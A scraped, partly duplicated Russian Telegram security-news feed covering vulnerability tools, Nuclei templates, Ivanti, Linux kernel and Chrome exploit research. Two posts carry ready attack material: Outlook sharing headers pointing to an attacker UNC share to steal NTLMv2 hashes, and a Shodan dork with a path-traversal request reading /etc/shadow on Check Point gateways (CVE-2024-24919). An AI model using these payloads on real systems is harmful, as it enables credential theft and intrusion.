🤔 Устали сначала собирать, а потом анализировать данные о различных CVE из NVD и других критически важных источников? Команда ProjectDiscovery позаботилась об этом и представила новый инструмент cvemap.
Он предоставляет структурированный и простой в навигации CLI к различным базам данных уязвимостей, а также позволяет выполнить:
✔️ Поиск и запрос набора данных CVE
✔️ Сопоставление CVE с Known Exploited Vulnerabilities Catalog
✔️ Сопоставление CVE и Exploit Prediction Scoring System
✔️ Сопоставление CVE и Common Platform Enumeration
✔️ Сопоставление CVE с PoC'ами на GitHub
✔️ Сопоставление CVE с Nuclei Template
✔️ Сопоставление CVE с отчетами HackerOne
#news #tools #CVE
Он предоставляет структурированный и простой в навигации CLI к различным базам данных уязвимостей, а также позволяет выполнить:
✔️ Поиск и запрос набора данных CVE
✔️ Сопоставление CVE с Known Exploited Vulnerabilities Catalog
✔️ Сопоставление CVE и Exploit Prediction Scoring System
✔️ Сопоставление CVE и Common Platform Enumeration
✔️ Сопоставление CVE с PoC'ами на GitHub
✔️ Сопоставление CVE с Nuclei Template
✔️ Сопоставление CVE с отчетами HackerOne
go install github.com/projectdiscovery/cvemap/cmd/cvemap@latest
#news #tools #CVE
Команда Varonis обнаружила новую багу в функции обмена календарями в Microsoft Outlook, при котором добавление двух заголовков в электронное письмо заставляет Outlook делиться контентом и связываться с указанной машиной, создавая возможность перехвата хэша NTLM v2.
К слову, это новый способ получения NTLM-хэшей среди двух других новых способов: с помощью Windows Performance Analyzer и проводника Windows.
Для тех, кто не знает, NTLM v2 — это криптографический протокол, используемый Windows для аутентификации пользователей на удаленных серверах. Хотя NTLM v2 является более безопасной версией оригинального NTLM, v2 все еще уязвим для атак методом брутфорса и не только.
📌 Те самые заголовки Outlook:
"Content-Class" = "Sharing"
"x-sharing-config-url" = \\(Attacker machine)\a.ics
#pentest #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
Всеволод Кокорин, исследователь безопасности в SolidLab, делится историей нахождения уязвимости и описывает технические аспекты, которые привели к её возникновению. Сама уязвимость существовала в течение длительного времени и была устранена в октябре 2023 года.
📌 Вы узнаете про Service Worker + PWA, про аспекты, связанные с Payment Request API и спецификацией JIT-installed воркеров, а также про то, как архитектурные решения в веб-приложениях могут привести к серьезным багам.
👉 Читать
#pentest #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🛠 Шаблоны Nuclei в январе 2024: что нового для этичного хакера
⚡️ За месяц команда ProjectDiscovery и сообщество написали 157 новых шаблонов Nuclei, из которых 36 CVE и 75 для сканирования багов, связанных с локальным повышением привилегий:
✅ CVE-2023-22527: Atlassian Confluence — Remote Code Execution
✅ CVE-2023-44353: Adobe ColdFusion WDDX Deserialization Gadgets
✅ CVE-2023-51467: Apache OFBiz < 18.12.11 — Remote Code Execution
✅ CVE-2023-7028: GitLab — Account Takeover via Password Reset
✅ CVE-2024-0204: Fortra GoAnywhere MFT — Authentication Bypass
✅ CVE-2024-23897: Jenkins < 2.441 — Arbitrary File Read
✅ CVE-2023-50917: MajorDoMo thumb.php — OS Command Injection
✅ CVE-2023-46805: Ivanti ICS — Authentication Bypass
✅ CVE-2023-47211: ManageEngine OpManager — Directory Traversal
✅ CVE-2023-6063: WP Fastest Cache 1.2.2 - Unauthenticated SQL Injection
#news #pentest #bugbounty #CVE
⚡️ За месяц команда ProjectDiscovery и сообщество написали 157 новых шаблонов Nuclei, из которых 36 CVE и 75 для сканирования багов, связанных с локальным повышением привилегий:
✅ CVE-2023-22527: Atlassian Confluence — Remote Code Execution
✅ CVE-2023-44353: Adobe ColdFusion WDDX Deserialization Gadgets
✅ CVE-2023-51467: Apache OFBiz < 18.12.11 — Remote Code Execution
✅ CVE-2023-7028: GitLab — Account Takeover via Password Reset
✅ CVE-2024-0204: Fortra GoAnywhere MFT — Authentication Bypass
✅ CVE-2024-23897: Jenkins < 2.441 — Arbitrary File Read
✅ CVE-2023-50917: MajorDoMo thumb.php — OS Command Injection
✅ CVE-2023-46805: Ivanti ICS — Authentication Bypass
✅ CVE-2023-47211: ManageEngine OpManager — Directory Traversal
✅ CVE-2023-6063: WP Fastest Cache 1.2.2 - Unauthenticated SQL Injection
#news #pentest #bugbounty #CVE
🤦♂️🔐 1 февраля этого года компания Ivanti объявила о закрытии серьезных уязвимостей в своих продуктах Ivanti Connect Secure и Ivanti Policy Secure. Эти уязвимости, обнаруженные в декабре 2023 года, уже активно эксплуатировались злоумышленниками, представляя значительную угрозу для VPN-серверов. Сложности с разработкой патча привели к тому, что CISA потребовало отключить уязвимые решения за день до выпуска обновлений. Это уже второй серьезный инцидент с продуктами Ivanti, предыдущий произошел в августе 2023 года.
Команда Volexity обнаружила две уязвимости (CVE-2023-46805 и CVE-2024-21887) в VPN-сервере, позволяющие обходить аутентификацию и выполнять произвольные команды. После публикации информации об уязвимостях количество атак значительно увеличилось. Ivanti предложила временные решения, но некоторые из них были обойдены атакующими. В конечном итоге, для полной защиты требовалась переустановка ПО с нуля и установка патча.
Естественно, команду Assetnote эти уязвимости заинтересовали. Их исследования, реверс прошивки и многое другое — под катом:
⚡️High Signal Detection and Exploitation of Ivanti's Pulse Connect Secure Auth Bypass RCE
⚡️Ivanti's Pulse Connect Secure Auth Bypass Round Two
#pentest #reverse #CVE
Команда Volexity обнаружила две уязвимости (CVE-2023-46805 и CVE-2024-21887) в VPN-сервере, позволяющие обходить аутентификацию и выполнять произвольные команды. После публикации информации об уязвимостях количество атак значительно увеличилось. Ivanti предложила временные решения, но некоторые из них были обойдены атакующими. В конечном итоге, для полной защиты требовалась переустановка ПО с нуля и установка патча.
Естественно, команду Assetnote эти уязвимости заинтересовали. Их исследования, реверс прошивки и многое другое — под катом:
⚡️High Signal Detection and Exploitation of Ivanti's Pulse Connect Secure Auth Bypass RCE
⚡️Ivanti's Pulse Connect Secure Auth Bypass Round Two
#pentest #reverse #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯 Анализ новой уязвимости Linux в nf_tables (CVE-2024-1086)
🤷♂️ Ничего такого, просто ядра Linux (5.14–6.7) подвержены уязвимости Local Privilege Escalation. А это самые распространенных ОС Debian и Ubuntu.
Автор написал своего рода исследование, в котором поделился первопричинами уязвимости и универсальным PoC'ом.
Материал отлично подойдет для новичков, которые хотят научиться искать баги в ядре Linux, потому что сложные темы разбиты на разделы (к которым можно вернуться, если совсем непонятно) и написаны простым языком.
👉 Читать
#research #linux #CVE
🤷♂️ Ничего такого, просто ядра Linux (5.14–6.7) подвержены уязвимости Local Privilege Escalation. А это самые распространенных ОС Debian и Ubuntu.
Автор написал своего рода исследование, в котором поделился первопричинами уязвимости и универсальным PoC'ом.
Материал отлично подойдет для новичков, которые хотят научиться искать баги в ядре Linux, потому что сложные темы разбиты на разделы (к которым можно вернуться, если совсем непонятно) и написаны простым языком.
#research #linux #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Все пишут про CVE-2024-24919, и мы напишем.
🔍 Дорк для Shodan:
Эксплуатация👇
#CVE
title:"Check Point" ssl:"target"
Эксплуатация👇
POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
#CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
🌐 Введение в эксплуатацию Chrome
Где одни из самых крупных выплат? Конечно, в браузерах. Читайте подробнее полезные заметки, которые уже переросли в глубокое исследование.
1. Introduction
2. The Chromium Security Architecture
3. The V8 Pipeline
• The Parser
• The Interpreter - Ignition
• The JIT Compiler - TurboFan
• The Maglev Compiler
4. Setting up the V8 Debugging Environment
5. CVE-2023-4069 RCA and Walkthrough
6. JIT-Spraying Shellcode
7. Addendum: Version Independent Shellcode
8. Conclusions
9. External References
👉 Читать
#research
Где одни из самых крупных выплат? Конечно, в браузерах. Читайте подробнее полезные заметки, которые уже переросли в глубокое исследование.
1. Introduction
2. The Chromium Security Architecture
3. The V8 Pipeline
• The Parser
• The Interpreter - Ignition
• The JIT Compiler - TurboFan
• The Maglev Compiler
4. Setting up the V8 Debugging Environment
5. CVE-2023-4069 RCA and Walkthrough
6. JIT-Spraying Shellcode
7. Addendum: Version Independent Shellcode
8. Conclusions
9. External References
👉 Читать
#research